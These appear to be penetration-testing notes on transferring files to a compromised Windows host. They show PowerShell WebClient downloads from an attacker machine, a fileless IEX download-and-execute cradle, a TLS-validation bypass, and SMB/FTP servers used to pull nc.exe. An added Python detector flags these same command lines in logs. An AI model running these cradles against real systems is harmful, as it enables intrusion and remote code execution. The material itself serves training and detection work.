# PowerShell Base64 String Copy+Paste

```bash
# encode the file on Linux
md5sum file                    # create and save the hash to confirm file integrity after transfer
cat file | base64 -w 0; echo   # output the base64-encoded string to stdout
```

```powershell
# copy+paste the encoded string into Windows
[IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>"))   # decode the base64 string to a file
Get-FileHash C:\Users\Public\<file_name> -Algorithm md5   # compare against the previous hash to confirm integrity
# NOTE: cmd.exe has a maximum string length of 8,191 characters
```

# PowerShell Web Download

- Typically HTTP and HTTPS are open to outbound traffic
- Defender may prevent the download of some file types like `shell.exe`
- Use the `System.Net.WebClient` class to download over HTTP, HTTPS, or FTP

```powershell
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
# NOTE: the target file could be on GitHub or hosted by the attacker machine
```

| WebClient Method    | Description                                                                                 |
| ------------------- | ------------------------------------------------------------------------------------------- |
| OpenRead            | Returns the data from a resource as a stream                                                |
| OpenReadAsync       | Returns the data from a resource without blocking the calling thread                        |
| DownloadData        | Downloads data from a resource and returns a Byte array                                     |
| DownloadDataAsync   | Downloads data from a resource and returns a Byte array without blocking the calling thread |
| DownloadFile        | Downloads data from a resource to a local file                                              |
| DownloadFileAsync   | Downloads data from a resource to a local file without blocking the calling thread          |
| DownloadString      | Downloads a String from a resource and returns a string                                     |
| DownloadStringAsync | Downloads a String from a resource without blocking the calling thread                      |

- PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet or its alias `IEX`

```powershell
IEX (New-Object Net.WebClient).DownloadString('<Target File URL>')   # directly run the target file in memory
(New-Object Net.WebClient).DownloadString('<Target File URL>') | IEX   # pipeline input from WebClient to IEX
# NOTE: the target file could be on GitHub or hosted by the attacker machine
```

- From PowerShell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the full `Invoke-WebRequest` name

```powershell
Invoke-WebRequest <Target File URL> -OutFile file_name.ps1
# NOTE: the target file could be on GitHub or hosted by the attacker machine
```

## Common Errors with PowerShell

- When the Internet Explorer first-launch configuration has not been completed, the download may be prevented. Add the flag below to the PowerShell download commands:
  - Add the `-UseBasicParsing` flag to `Invoke-WebRequest` or `IEX`
- When encountering errors related to the SSL/TLS secure channel because the certificate is not trusted, execute the following PowerShell command and retry the download command (note that it disables certificate validation for every connection made by that PowerShell process, not just the one download):
  - `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`

# SMB Downloads

- Leverage SMB (TCP/445) to download files to the target Windows machine from the attacker's Kali machine
- First, create an SMB server on Kali and host the file
- Second, use `copy`, `move`, PowerShell `Copy-Item`, or the like to pull the file from the Kali SMB server

## Create SMB Server on Linux

```bash
sudo impacket-smbserver share -smb2support /tmp/share                              # host files in /tmp/share via SMB
sudo impacket-smbserver share -smb2support /tmp/share -user test -password test    # host files with test:test authentication
# impacket-smbserver = smbserver.py
# here 'share' = share name
```

## Copy File from SMB Server

```cmd
copy \\<kali_host_ip>\share\nc.exe
```

## Mount SMB Share with Username:Password Authentication

```cmd
:: newer Windows versions block unauthenticated guest access to shares
:: mount the share
net use n: \\<kali_host_ip>\share /user:test test
:: copy from the mounted share
copy n:\nc.exe
```

# FTP Downloads

- Set up an FTP server on the Kali host

```bash
sudo pip3 install pyftpdlib             # install the python module
sudo python3 -m pyftpdlib --port 21     # start the FTP server on port 21; by default this module uses port 2121
```

- Download files from the FTP server using PowerShell

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/file.txt', 'C:\Users\Public\ftp-file.txt')
```

- If we don't have an interactive shell on the remote machine to access PowerShell, use the steps below to create an FTP command file that downloads the file from the FTP server

```cmd-session
C:\htb> echo open <kali_host_ip> > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET file.txt >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt   # execute the FTP command file
# below are the automated steps based on the FTP command file
ftp> open <kali_host_ip>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\htb> more file.txt   # display the received file
This is a test file
```

# Upload Operations

- Situations may occur, such as password cracking, analysis, exfiltration, etc., where we must upload files from the target machine to our Kali host

## PowerShell Base64 Copy+Paste

## PowerShell Web Uploads

- Configure an upload server on the Kali host

## SMB Uploads

## FTP Uploads
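The download commands collected in the Web Download, Common Errors, SMB and FTP sections above are also exactly the strings a defender looks for in process-creation telemetry. The Python script below is an added example, not part of these notes: it scans command-line strings (as logged in the CommandLine field of Sysmon Event ID 1 or Windows Security Event 4688) for those patterns and scores each line. The rule names, weights, severity thresholds and sample log lines are constructed for illustration, and 192.0.2.10 is a documentation-range placeholder address.

```python
"""Added example (not part of the original notes): flag the PowerShell/cmd
file-transfer command lines documented above in process-creation logs.
Rule names, weights, thresholds and the sample log lines are constructed."""
import re
from typing import Dict, List, Tuple

# Each rule: (name, weight, compiled pattern). The patterns target the exact
# cradles listed in the notes; the weights are an assumption to tune locally.
RULES: List[Tuple[str, int, re.Pattern]] = [
    # (New-Object Net.WebClient).DownloadFile / DownloadString / DownloadData
    ("webclient_download", 2,
     re.compile(r"Net\.WebClient\)\.Download(File|String|Data)", re.I)),
    # IEX / Invoke-Expression: script executed in memory, nothing written to disk
    ("iex_in_memory_exec", 3,
     re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    # Invoke-WebRequest and its iwr/curl/wget aliases writing a file with -OutFile
    ("iwr_outfile", 2,
     re.compile(r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b)[^|]*-OutFile", re.I)),
    # certificate validation switched off for the whole process
    ("tls_validation_disabled", 3,
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    # base64 blob pasted into the console and decoded straight to a file
    ("base64_to_disk", 2,
     re.compile(r"WriteAllBytes\(.*FromBase64String", re.I)),
    # ftp.exe driven by a command file (-s:), the no-PowerShell fallback
    ("ftp_script_file", 2,
     re.compile(r"\bftp(\.exe)?\b.*-s:", re.I)),
    # drive letter mapped to a remote SMB share
    ("net_use_remote_share", 1,
     re.compile(r"\bnet(\.exe)?\s+use\b.*\\\\", re.I)),
]

# Constructed sample CommandLine values; 192.0.2.10 is a placeholder address.
SAMPLE_LOGS: List[str] = [
    r'''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/run.ps1')"''',
    r'''powershell.exe -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; (New-Object Net.WebClient).DownloadFile('https://192.0.2.10/tool.exe','C:\Users\Public\tool.exe')"''',
    r'''powershell.exe -c "Invoke-WebRequest https://192.0.2.10/file.ps1 -OutFile file.ps1 -UseBasicParsing"''',
    r'''powershell.exe -c "[IO.File]::WriteAllBytes('C:\Users\Public\nc.exe',[Convert]::FromBase64String('QUFBQQ=='))"''',
    r"cmd.exe /c ftp -v -n -s:ftpcommand.txt",
    r"cmd.exe /c net use n: \\192.0.2.10\share /user:test test",
    r'''powershell.exe -c "Get-Date"''',                                   # benign
    r"C:\Windows\System32\curl.exe -sS https://example.org/ -o page.html",  # native curl, not the alias
]


def classify(cmdline: str) -> Dict[str, object]:
    """Return the matching rule names, the summed weight and a severity label."""
    hits = [name for name, _w, pat in RULES if pat.search(cmdline)]
    score = sum(w for name, w, _p in RULES if name in hits)
    if score >= 5:
        severity = "high"      # e.g. download cradle chained into IEX
    elif score >= 2:
        severity = "medium"
    elif score >= 1:
        severity = "low"
    else:
        severity = "none"
    return {"cmdline": cmdline, "hits": hits, "score": score, "severity": severity}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Classify every command line and keep only those that matched a rule."""
    return [r for r in (classify(line) for line in lines) if r["hits"]]


if __name__ == "__main__":
    for result in scan(SAMPLE_LOGS):
        print(f"[{result['severity']:>6}] {', '.join(result['hits'])}: {result['cmdline'][:80]}")
```

Running the script prints six of the eight constructed lines; the `Get-Date` line and the native `curl.exe` invocation produce no hits because the alias rule is keyed on `-OutFile` rather than on the word `curl` alone. A WebClient download chained into `IEX`, or paired with the certificate-validation bypass from the Common Errors section, reaches the high threshold on its own, which mirrors the fileless pattern the notes describe.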